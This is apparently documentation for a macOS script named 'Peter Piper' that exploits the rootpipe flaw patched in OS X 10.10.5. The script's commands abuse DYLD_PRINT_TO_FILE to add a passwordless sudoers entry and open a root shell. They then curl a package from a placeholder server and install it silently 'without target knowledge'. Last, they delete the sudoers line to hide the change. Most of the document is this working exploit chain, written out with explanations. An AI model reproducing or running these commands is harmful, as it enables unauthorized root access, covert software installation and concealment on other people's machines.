Peter Piper Documentation

1. INTRODUCTION
This script was made as an alternative to legitimate authentication in Applescript. This script uses a method of exploitation in OS X called root piping.

2. EXPLOIT
This exploit uses a vulnerability that was properly fixed in OS X 10.10.5. It’s reference information is here. This exploit gives whatever user that executes it admin instantly.

3. INSTALL
We use cURL to get the Java 8 Update 60 package onto the target computer and into a temporary directory, then the installer command featured in the OS X command line to install the .pkg we fetched. This is the correct command for this particular task because it skips the graphical installer meaning it can run behind the scenes without target knowledge.

4. CLEANUP
We first remove the temporary directory used to store the Java package during install, then we use the command sed to remove the target from the sudoers list.

5. function KeepSafe { } & trap
This is used to ensure the completion of the command if it fails.

IN-DEPTH LOOK AT function KeepSafe { } COMMANDS

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; - Exploit the machine
sudo bash -c - Create a root bash shell
if [[ $EUID -ne 0 ]]; then echo -e "\033[1mFailed! No root!\033[0m $(exit 1)"; - Check if the exploit actually worked, if not, exit the script
sudo mkdir -v /tmp$$; - Make a temporary directory to store the package in
sudo curl -# http://<SERVER_ADDRESS>/Java_8_Update_60.pkg > /tmp$$/Java_8_Update_60.pkg; - Get the package
sudo installer -verbose -pkg /tmp$$/Java_8_Update_60.pkg -target LocalSystem; - Install the package
sudo sed -i "" "/NOPASSWD:ALL/d" /etc/sudoers; - Remove the line allowing root access without a password
rm -rfv /tmp$$; - Remove the temporary directory